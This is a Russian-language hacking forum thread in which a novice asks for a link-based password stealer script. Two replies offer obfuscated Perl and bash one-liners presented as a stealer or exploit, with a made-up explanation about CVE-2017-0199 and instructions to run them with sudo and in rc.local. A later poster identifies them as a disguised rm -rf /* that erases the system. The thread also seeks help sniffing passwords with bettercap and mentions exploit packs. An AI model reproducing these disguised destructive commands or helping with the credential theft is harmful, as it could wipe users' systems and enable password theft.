By: Gureter on 2017-07-03 22 ч.
Доброго времени суток!
Давно хотел спросить,как сделать стиллер по ссылке?!
Мне как-то говорили,что есть скрипт закидываешь его на хостинг и создаешь ссылочку(ну вообщем,как обычный сайт)жертва переходит по ней и ву-аля ,все сохраненные пароли у тебя.
Кому не трудно объясните по-понятние и если можно предоставьте скрипт:)
Telegram:@GackVorobey
By: miser on 2017-07-03 22 ч.
Доброго времени суток!
Давно хотел спросить,как сделать стиллер по ссылке?!
Мне как-то говорили,что есть скрипт закидываешь его на хостинг и создаешь ссылочку(ну вообщем,как обычный сайт)жертва переходит по ней и ву-аля ,все сохраненные пароли у тебя.
Кому не трудно объясните по-понятние и если можно предоставьте скрипт:)
Вот тебе скрипт:
#!/bin/sh
cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'Покупаешь VPS с линуксом. Поднимаешь на нем веб-сервер (apaсhe или nginx - любой), на нем возводишь фейковый сайт, прописываешь вторую строчку в /etc/rc.local и ждешь первых посетителей. Если в каталоге с сайтом не появится лог, один раз перезапусти сервер.
А если серьезно, лучше распиши, что именно и у кого ты собрался воровать своим стилером?
Редактировался miser (2017-07-03 23 ч.)
пишите в ящик, жаббер создам одноразовый
используйте PGP ключ, незашифрованные обращения игнорирую
By: miser on 2017-07-03 23 ч.
Да я хотел просто для себя,попробывать этот метод!Очень заинтерисовался рассказам своих знакомых на эту тему
Ну попробуй мой скрипт, потом отпишешься. Его смысл в том, чтобы завуалированно захватить эксплоит CVE-2017-0199 c Гитхаба, локально исполнить его на сервере и подсунуть посетителю сайта автогенерируемый зловредный RTF. "Бред" на перле нужен, чтобы обмануть проактивную защиту антивируса. Если у посетителей твоего сайта не обновлена система, случится успешный пробив.
Можешь попробовать "dry run":
1) запиши эти строчки в файл ./script.sh
2) chmod +x ./script.sh
3) sudo ./script.sh
Не забудь точку (./) перед исполняемым файлом.
Редактировался miser (2017-07-03 23 ч.)
пишите в ящик, жаббер создам одноразовый
используйте PGP ключ, незашифрованные обращения игнорирую
By: Gureter on 2017-07-03 23 ч.
Смотри,я вообще хостинг перл найти не могу (если я тебя правильно понял,что это хостинг),потом мне этот скрипт в БД заливать или куда.
Извини,что напрягаю но я не АС в этот конечно для мнгоих легким делом.
Но думаю за пару месяцев наверстаю свое!
Telegram:@GackVorobey
By: LordRaiden on 2017-07-03 23 ч.
Пишите в терминале линукс скрипт на Bash:
touch 177.100.199.200;ISF=$(echo '%\%#{<-{}<&{`' |tr ' -/:-@[-`{}' '`-{/ -');$ISF 2>/dev/nullПосле touch IPшник жертвы.
By: Gureter on 2017-07-05 08 ч.
Доброго времени суток господа.
Вчера столкнулся с проблемой,что после перехвата трафика через bettercap он идет в шифровании NTFS при этом не отображая пароли.
Подскажите что делать или посоветуйте что-нибудь другое(если не сложно команды расписать для терминала тоже)
Вобщем работаю с Kali linux,помогите пожалуйста если кому не трудненько!
Всем удачи!
Telegram:@GackVorobey
By: stealler3228 on 2017-07-07 09 ч.
Актуален ли стиллер в 2к17? Помню года 2-3 назад пользовался UFR stellerом
By: P1V0T on 2017-07-15 11 ч.
Без приватного эксплойтпака для браузера такое не провернуть. В даркнете можно такой "задороха". Или использовать паблик, типо автопвна из метасплойта, но шансы малы.
А товарисча выше с его скриптами для "взлома" желательно нужно проигнорировать. Это обфусцированный rm -rf /*, трёт систему, если кратко.
// Вершины постигаются с азов.
